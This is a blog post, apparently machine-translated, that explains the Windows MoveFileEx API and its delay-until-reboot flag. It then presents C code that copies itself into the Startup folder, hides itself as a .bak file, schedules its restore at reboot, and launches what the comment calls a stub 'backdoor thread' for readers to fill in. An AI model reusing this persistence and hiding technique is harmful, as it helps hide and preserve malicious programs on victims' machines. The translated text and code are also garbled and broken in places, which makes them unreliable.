Use movefileex to hide, start, and delete programs

1. Learn more about movefileex
Movefileex is an extension of the movefile function. It is also used to move files, but some more functions are provided. The movefileex function is prototype as follows:
Bool movefileex (
Lptstr lpexistingfilename, lptstr lpnewfilename, DWORD dwflags );
The first parameter is the file name to be moved, and the second parameter is the file name after moving. The last parameter determines the moving method.
Take a closer look at the value of the last parameter. One of the values is movefile_delay_until_reboot, which is described as follows in msdn:
The function does not move the file until the operating system is restarted. the system moves the file immediately after autochk is executed, but before creating any paging files. consequently, this parameter enables the function to delete paging files from previous startups.
This flag can only be used if the process is in the context of a user who belongs to the Administrator Group or the LocalSystem account.
This flag cannot be used with the movefile_copy_allowed flag.
When dwflags is set to movefile_delay_until_reboot, the function does not move the file until the system restarts. Note that the file is moved after the autochk is executed and before the page file is created. At this time, the user has not completely entered the operating system, so you can apply this to delete files that are difficult to delete under normal circumstances, or even page files.
When lpnewfilename is null, movefileex implements the delete function. Many anti-virus software and some malicious Program The delete tool uses this feature of the movefileex function to delete viruses after restart.
Movefile_delay_until_reboot indicates that the process context must be administrator or LocalSystem user.
The movefile_delay_until_reboot tag cannot be used with the movefile_copy_allowed tag. Because different volumes cannot be moved, when the movefile_copy_allowed mark is used, the function can be moved by simulating the copyfile and deletefile functions. Running programs cannot be moved to different volumes (partitions). At this time, only copyfile is implemented. If deletefile is not successful in the next step, running programs cannot be deleted.

When the dwflags parameter is set to movefile_delay_until_reboot, movefileex contains the following multi-character registry value (reg_multi_sz) for the file to be moved after restart and the location of the file to be moved: HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session \ Manager \ pendingfilerenameoperations.

# Include " Stdafx. h "
# Include < Stdio. h >
# Pragma Comment (linker, "/subsystem: Windows ")

DWORD winapi startshell (lpvoid lpparam );

IntApientry winmain (hinstance,
Hinstance hprevinstance,
Lpstr lpcmdline,
IntNcmdshow)
{

Char Szpath [ 100 ] = { 0 };
: Getsystemdirectory (szpath, max_path );
Char Szdst [ 100 ] = { 0 };
For ( Int I = 0 ; I < 3 ; I ++ )
Szdst [I] = Szpath [I];
Strcat (szdst, " Documents and Settings \ All Users \ Start Menu \ Program \ Start \ mao.exe " );

Tchar sztmp [max_path] = { 0 };
If ( ! Getmodulefilename (null, sztmp, Sizeof (Sztmp )))
{

Return   0 ;
}
Int R;
R = Strcmp (sztmp, szdst );
If ( ! R)
{
Goto Stop;
}

If ( ! Copyfile (sztmp, szdst, false ))
{
Return   0 ;
}

Stop:

//Printf ("\ n \ t current directory is % s \ n", szdst );

//Get the current program name
Tchar szcurpath [max_path];
Memset (szcurpath,0, Max_path );
Getmodulefilename (null, szcurpath,Sizeof(Szcurpath)/Sizeof(Tchar ));

If ( ! (Movefileex (szcurpath, " C: \ Windows \ FK. Bak " , Movefile_replace_existing | Movefile_copy_allowed ))) // Copy_allowed is required if you want to move files under different volume

: MessageBox (null, " Failed to move the file for the first time " , " Test " , Mb_ OK );

If ( ! : Movefileex ( " C: \ Windows \ FK. Bak " , Szdst, movefile_delay_until_reboot | Movefile_replace_existing ))
{
: MessageBox (null, " An error occurred while moving the file. " , " Test " , Mb_ OK );
}
Else Printf ( " Task completed \ n " );
/* System ("pause "); */

// Create and wait for Thread
// Startshell is a backdoor thread function. You can implement the corresponding functions by yourself.
Handle hthread = : Createthread (null, null, startshell, null );
: MessageBox (null, " Haha. " , " Test " , Mb_ OK );
Closehandle (hthread );
: Waitforsingleobject (hthread, infinite );

Return   0 ;
}

DWORD winapi startshell (lpvoid lpparam)
{
: MessageBox (null,"Haha.","Test", Mb_ OK );
Return 0;
}

/Files/tt_mc/movefile.rar